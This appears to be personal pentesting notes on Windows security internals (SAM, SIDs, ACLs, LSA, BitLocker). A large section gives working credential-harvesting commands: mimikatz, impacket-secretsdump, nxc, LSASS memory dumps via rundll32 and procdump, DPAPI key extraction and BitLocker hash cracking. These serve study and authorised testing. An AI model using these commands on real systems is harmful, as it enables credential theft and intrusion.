Windows Security
Windows has built-in tools and features to increase the security and reduce the attack surface exploitable for hackers.
Formerly known as Windows Defender, Windows Security provides features to help ensure the safety and privacy of the system.
- πͺ² Antivirus
- π° Ransomware protection
- π« Network Firewall
- π SmartScreen
- ...
It's important to keep the operating system up to date. Windows Update is responsible for downloading and installing them.
Updates are usually released on the 2nd Tuesday of each month, which is often called "Patch Tuesday."
You can open Windows Update from a terminal using: control /name Microsoft.WindowsUpdate
.
Microsoft frequently releases security updates for their products.
Authentication & Authorization
Security Accounts Manager (SAM)
The SAM (Security Accounts Manager) database is a local database present on every Windows computer. It is used for authentication. It stores account information including usernames and password hashes.
Modern versions of Windows use the NT hash format, commonly referred to as NTLM, as the previous format was LM.
The database is stored in: /Windows/System32/config/SAM/
(admin-only).
π The SAM database is mounted in the registry at hklm/sam
.
β οΈ The SAM database is often partially encrypted using SYSKEY.
SYSKEY, Bootkey, and System Hive
SYSKEY is a security feature that partially encrypts the SAM database with a key to protect against offline cracking.
- SYSKEY define the configuration of the bootkey
- The bootkey is the key used to encrypt the SAM database
- The system hive contains the bootkey.
π The system hive is stored in: /Windows/System32/config/System/
(admin-only) and mounted in the registry at hklm/system
.
Security Hive
The security hive is used to store security configuration, but it's also used to store cached domain-joined credentials.
π It is mounted in the registry at hklm/security
.
Security Identifier (SID)
Each object (user, service, etc.) that can be authenticated is called "Security Principal," and has a security identifier (SID). They are used to verify that the user is authorized to an action.
A SID is a concatenation of a domain identifier and a relative identifier (RID). They start with S-
. The last hyphen-separated value is the RID.
PS> whoami /user
PS> wmic useraccount get name,sid
For a domain user, the SID is <domain SID>-<rid>
. The administrator RID is usually 500
/0x1f4
.
Access Control
The access to any resources is managed by Access Control Entries (ACEs) in Access Control Lists (ACLs). An ACL is a set of ACEs.
Each ACE specifies the permissions (R, W, X, etc.) granted or denied for a particular user or group (a SID) over a "securable object". A securable object refers to a resource that can be secured (files, services, etc.). In short, we have a SID, an access mask (32-bit for perms), inherit-flags (I), and ACE type (granted/denied).
A security descriptor is a data structure associated with a securable object. It contains information such as:
- Discretionary Access Control List (DACL): A list of ACEs
- System Access Control List (SACL): Optionally, a list that specifies which security events should be audited.
If there is no DACL, every user is granted full rights.
Access Token
Access tokens are dynamically generated by Windows. They represent the security context of a thread/process. It's a data structure to store information allowing Windows to check if a process is allowed or not to access a securable object.
- User SID and Group SIDs
- Privilege and permissions beyond an object DACLS
- ...
Local Security Authority (LSA)
The Local Security Authority (LSA) is a process responsible for security-related functions in the operating system.
- Authenticating users
- Enforcing security policies
- Generating access tokens (contains security information such as privileges, used by processes/... to authorize users)
It's managed by lsass.exe
, the Local Security Authority Subsystem Service (LSASS).
From what I understand, LSA secrets are entries in the registry that may contain cleartext passwords along the DPAPI key, etc.
BitLocker Encrypted Drive
BitLocker is a full disk encryption feature on Windows. We must unlock the drive at boot in order to read its contents.
- π± USB key
- π Pin or Password
- π· Trusted Platform Module (TPM)
- β οΈ Network Unlock
A recovery key can alternatively be used. It's a randomly generated 48-digit string of numbers. It can be saved on Active Directory, on your Microsoft Account, on an external drive, etc.
Bitlocker needs the drive to have two partitions. The first partition has the necessary files to start the system, while the other has the full operating system and our files.
Assuming you mounted the locked partition in /dev/xxxp2
:
$ # unlock and map in /dev/mapper/mytag
$ sudo cryptsetup bitlkOpen /dev/xxxp2 mytag
$ sudo cryptsetup bitlkClose mytag
You can extract the user password ($0
/$1
) or the recovery key ($2
/$3
). You can then try hash cracking or bitcracker (0.8k β, 2021 πͺ¦).
$ # https://openwall.info/wiki/john/OpenCL-BitLocker
$ bitlocker2john -i xxx.vhd > myhashes
$ grep "bitlocker\$0" myhashes > myhash
$ hashcat -m 22100 myhash wordlist
Windows Credentials Harvesting Notes β οΈ
Article about it: Windows secrets extraction: a summary.
Windows Credentials Harvesting β Overview
Pentesters may find themselves in one of the following scenarios. The tools that we use vary accordingly:
- π Extract And Analyze Data from Windows (mimikatz)
- π² Extract And Analyze Data from Linux (impacket, nxc)
- π Extract Data on Windows, Analyze on Linux (mimikatz, pypykatz)
Additionally, metasploit's meterpreter includes modules to dump hashes as root AND it includes mimikatz (no need to upload it!).
Dump Credentials From The SAM Database
You can dump the hives and analyze them with Mimikatz.
PS> reg save hklm\system C:\XXX\system.hive
PS> reg save hklm\sam C:\XXX\sam.hive
PS> reg save hklm\security C:\XXX\security.hive
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive
mimikatz# lsadump::sam /system:./system.hive /sam:./sam.hive /security:./security.hive
If you have a meterpreter, you can use kiwi:
meterpreter> load kiwi; lsa_dump_sam
From Linux, you can dump hashes from SAM using:
$ nxc smb IP -u xxx -p yyy --sam
$ nxc smb IP --local-auth -u xxx -p yyy --sam
On Linux, you can analyze locally downloaded hives using:
PS> reg save [...] # and send them to Linux
$ impacket-secretsdump -sam sam.hive -security security.hive -system system.hive LOCAL
On Linux, you can remotely dump hashes using impacket:
$ impacket-secretsdump example.com/username:password@TARGET
On Windows, you can use DSInternals (1.5k β, π») too.
Dump Credentials Protected By The DPAPI
The Data Protection API (DPAPI) is a component of Windows that can be used to encrypt data, and is used by software such as for the Google Chrome saved passwords feature (more on that here).
The user password is encrypted to generate a DPAPI master key, usually stored in %appdata%\Roaming\Microsoft\Protect\
(hidden).
- π Each folder name is from the SID of the associated user
- π The file inside the SID folder is the user DPAPI master key file
- π We can crack the user password from the master key file
- π If we have the user password, we can extract the master key. With the SID
S-A-B-C-D-E-F-G
and the filenameH-I-J-K-L
:
$ pypykatz dpapi prekey password S-A-B-C-D-E-F-G password -o ./prekey
$ pypykatz dpapi masterkey ./H-I-J-K-L ./prekey -o mkf
$ impacket-dpapi masterkey -file H-I-J-K-L -sid S-A-B-C-D-E-F-G -password password
- π We can extract the master key from the LSASS process memory
Dump Credentials From The Credential Manager
Windows has a feature called credential manager used by apps to store credentials. Each user has one usually stored in %appdata%\Local\Microsoft\Credentials\
.
It can be accessed from the GUI, or using the command line:
PS> vaultcmd /list
PS> vaultcmd /listcreds:"Web Credentials" /all
PS> vaultcmd /listcreds:"Windows Credentials" /all
You can also use Mimikatz:
mimikatz# vault::list
mimikatz# vault::cred
Dump mscash Secrets
Refer to ired.
Dump LSA Secrets
From Linux, you can use:
$ nxc smb IP --local-auth -u xxx -p yyy --lsa # dump secrets
If you have a meterpreter, you can use kiwi:
meterpreter> load kiwi; lsa_dump_secrets
On Linux, you can remotely dump them using impacket:
$ impacket-secretsdump example.com/username:password@TARGET
Dump Credentials From LSASS Process Memory
The LSASS process that contains the DPAPI masterkey for the logged user. It can be used to decrypt credentials for applications that use it. It also contains tickets, and wDIGEST cleartext credentials.
You can dump the memory using rundll32 (admin not required?):
PS> tasklist /svc | findstr "lsa"
lsass.exe 4242
PS> Get-Process lsass | Select Id
Id
--
4242
PS> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4242 C:\lsass.dmp full
<detected by antivirus>
You can dump the memory using procdump (admin required):
PS> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp
On Windows, with Mimikatz, you can dump the process OR you can use a dump that you created manually.
mimikatz# lsadump::lsa /patch # Dump
mimikatz# sekurlsa::minidump ./lsass.dmp # Load a dump
mimikatz# sekurlsa::dpapi # ...
mimikatz# sekurlsa::logonpasswords # ...
On Linux, you can read the memory dump using pypykatz.
$ pypykatz lsa minidump lsass.dmp
Windows Security Notes π‘οΈ
Microsoft Local Administrator Password Solution (LAPS)
Microsoft Local Administrator Password Solution (LAPS) was designed to prevent lateral movement as often when the local administrator account password is reused (mostly due to golden images).
It manages local administrator passwords and rotates them.
The LAPSToolkit (0.7k β) can detect which machines have LAPS installed and which machines don't. It can also detect which users can view the LAPS password for each machine.
PS> Find-LAPSDelegatedGroups
PS> Find-AdmPwdExtendedRights
PS> Get-LAPSComputers
Random Notes
Alternate Data Streams (ADS)
On NTFS filesystem, ADS allows files to have more than one stream of data. By default, every file has one stream called :$DATA
.
PS> Get-Item -Path SomeFile -Stream * # list streams
PSPath : Microsoft.PowerShell.Core\FileSystem::XXX\toto.pdf::$DATA
PSParentPath : Microsoft.PowerShell.Core\FileSystem::XXX
PSChildName : toto.pdf::$DATA
PSDrive : XXX
PSProvider : Microsoft.PowerShell.Core\FileSystem
PSIsContainer : False
FileName : XXX\toto.pdf
Stream : :$DATA
Length : 0
PS> gci -recurse | % { gi $_.FullName -stream * } | where stream -ne ':$Data'
They can be used by Windows to store data, such as identifiers telling Windows that this file was downloaded from the Internet.
Hackers can use that to store malicious code inside a file. This code may be executed by a vulnerable application loading the file.
PS> $(Resolve-Path .\file.exe:stream) # vulnerable PS call
PS> wmic process call create $(Resolve-Path file.exe:stream)
Volume Shadow Copy Service (VSS)
The Volume Shadow Copy Service (VSS) is handling the creation, and management of shadow copies/snapshots of the data backed up.
It stores data in the "volume information" of each drive that has the feature enabled. They may allow a system admin to restore the system after an attack. Hackers will most likely check them and delete them.
To manage them, right-click on a hard-drive, and select "Shadow copies." Shadow copies can be stored externally.
PS> vssadmin CREATE SHADOW /For=C:
PS> vssadmin list volumes
π To restore a shadow copy, right-click on a folder, navigate to 'previous versions', select one, and press 'restore.'
β‘οΈ See also: Volume Shadow Copy Service and diskshadow.
PowerShell SecureString
PowerShell SecureString class represents text that should be kept confidential. You can create one using:
PS> $SecurePassword = ConvertTo-SecureString "Toto" -AsPlainText -Force
PS> $SecurePassword = Get-Content xxx.enc | ConvertTo-SecureString -key $(Get-Content "xxx.key")
To decrypt one, there are various methods:
PS> $UnsecurePassword = ConvertFrom-SecureString -SecureString $SecurePassword -AsPlainText
PS> $UnsecurePassword = (New-Object PSCredential 0, $SecurePassword).GetNetworkCredential().Password
For credentials stored using Export-Clixml
, use:
PS> $credential = Import-Clixml -Path 'pass.xml'
PS> $credential.GetNetworkCredential().Password
π» To-do π»
Stuff that I found, but never read/used yet.
- lusrmgr.msc: can be used to find entrypoints (weak passwords, groups with too many perms)
- msconfig (find malware?)/winver (outdated?)/control system (open ports...)/msinfo32 (outdated?)/compmgmt (scheduled tasks...)/regedit (misconfiguration...): info can help in find vulnerabilities
- UserAccountControlSettings: identify weakness
- Microsoft Security Compliance Toolkit (SCT)
- CIS-CAT
- Microsoft Defender Application Control
- device guard
- Hiren's bootcd
- SASE
- Windows credential guard
- Windows Tilde Filenames (Refer to IIS)
- Windows Defender Firewall
- Block access to share if not in the same workgroup?
- Application Whitelisting
- AppLocker
- Local Group Policy (gpedit.msc)
-
rundll32 shell32.dll,Control_RunDLL .\xxx.dll
- Admin Approval Mode (AAM) enabled (new admins: regular token but can elevate, medium mandatory level)
- Default RID 500 administrator, high mandatory level
- Defender External Attack Surface Management